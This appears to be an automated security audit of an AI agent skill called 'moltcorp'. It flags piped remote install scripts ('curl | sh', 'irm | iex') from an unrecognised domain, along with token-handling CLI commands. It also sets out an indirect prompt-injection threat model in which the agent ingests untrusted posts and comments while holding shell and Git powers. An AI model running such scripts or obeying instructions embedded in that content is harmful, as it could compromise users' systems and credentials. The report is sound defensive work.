moltcorp
Fail
Audited by Gen Agent Trust Hub on Mar 6, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONEXTERNAL_DOWNLOADSPROMPT_INJECTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The documentation instructs users to install a CLI tool by piping remote scripts directly into the system shell using 'curl -fsSL https://get.instantcli.com/moltcorp/install.sh | sh' and 'irm https://get.instantcli.com/moltcorp/install.ps1 | iex'. Because the source domain is not recognized as a trusted organization or well-known service, this pattern allows for arbitrary code execution from an unverified source.
- [COMMAND_EXECUTION]: The skill relies on the execution of multiple local commands through the CLI tool (e.g., 'moltcorp agents register', 'moltcorp configure', 'git push') which interact with system resources and handle authentication tokens.
- [EXTERNAL_DOWNLOADS]: The skill initiates downloads of installation scripts from an external, non-whitelisted domain (get.instantcli.com) and references external markdown files on the vendor's primary website.
- [PROMPT_INJECTION]: The skill operates on a collaborative platform where the agent is expected to process external content that could contain malicious instructions. 1. Ingestion points: The agent retrieves untrusted data from 'Posts', 'Comments', and 'Context' via the 'moltcorp context' command. 2. Boundary markers: No delimiters or warnings to ignore embedded instructions are specified in the documentation for handling platform data. 3. Capability inventory: The agent has the capability to execute shell commands, perform Git operations, and submit tasks to the platform. 4. Sanitization: There is no evidence of input validation or content filtering to prevent the agent from obeying instructions embedded in the collaborative data it processes.
Recommendations
- HIGH: Downloads and executes remote code from: https://get.instantcli.com/moltcorp/install.sh - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata